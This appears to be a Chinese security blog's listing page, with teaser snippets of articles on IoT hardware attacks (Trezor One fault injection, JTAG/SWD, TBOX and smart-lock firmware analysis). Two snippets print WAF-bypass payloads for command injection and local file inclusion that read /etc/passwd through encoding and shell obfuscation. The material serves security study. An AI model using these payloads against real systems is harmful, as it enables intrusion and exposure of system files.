概述在过去的四五年里,围绕加密货币钱包的安全性,已经有很多公共工作。这些研究大部分都属于故障注入领域,故障注入是破坏嵌入式系统的艺术/科学,足以导致未定义的行为发生。目标是找到一个故障,允许修改设备的...
11月14日81 views评论攻击面
物联网安全
物联网安全-22重现对 Trezor One 的故障注入攻击
11月14日81 views评论攻击面
物联网安全
11月14日81 views评论攻击面
物联网安全
物联网安全 - 18 硬件攻击面 - JTAG、SWD
JTAG、SWD本博客是物联网安全系列的一部分,我们将讨论有关物联网/工业物联网生态系统及其安全性的基本概念。如果你还没有看过该系列的前几篇博客,我会敦促你先看一遍。如果您只对硬件JTAG、SWD感兴...
11月06日27 views评论攻击面
物联网
物联网安全 - 14 硬件调试端口指南:概述和识别
本博客是物联网安全系列的一部分,我们将讨论与物联网/工业物联网生态系统及其安全性相关的基本概念。如果你还没有看过该系列的前几篇博客,我强烈建议你先看一遍。如果您只对硬件调试端口感兴趣,请随时继续。本周...
10月30日11 views评论物联网
物联网安全
记一次某TBOX的分析过程
前言由于项目太忙公众号已经停更一段时间,近期会重新开始更新并活跃。本篇文章取自实验室内部学习材料,记录了一次TBOX从硬件分析到软件逆向的完整过程,希望可以给大家起到一定的启示作用。硬件分析整板关键芯...
06月05日6 views评论a
flash
RCE/LFI Bypass的一些技巧
我们现在有一个pocc%0aat /et%0ac/pas%0aswd通过 globbing 绕过 Web 应用程序防火墙 (WAF)Bash 可以执行文件名通配,这个过程称为“通配”,但它不使用标准的...
05月09日78 views评论bypass
rce
[胖猴小玩闹]智能门锁与BLE设备安全第十五篇:云丁鹿客门锁BLE通信的分析(下)
1简介上一篇文章中我们通过SWD接口提取出了门锁固件,并使用IDA顺利加载了固件,本篇将继续对固件进行分析,研究门锁如何处理手机通过BLE下发BleKey的通信数据。书接上文,我们仿照果加门锁固件的处...
06月27日17 views评论aes
ida
Lfi wafbypassnnfile:/etc/passwd?/nfile:/etc/passwd%3F/nfile:/etc%252Fpasswd/nfile:/etc%252Fpasswd%3F/nfile:///etc/?/../passwdnfile:///etc/%3F/../passwdnfile:${br}/et${u}c/pas${te}swd?/nfile:$(br)/et$(u)c/pas$(te)swd?/
原文始发于微信公众号():Lfi wafbypassnnfile:/etc/passwd?/nfile:/etc/passwd%3F/nfile:/etc%252Fpasswd/nfile:/etc%...
05月13日安全文章20 views评论etc
passwd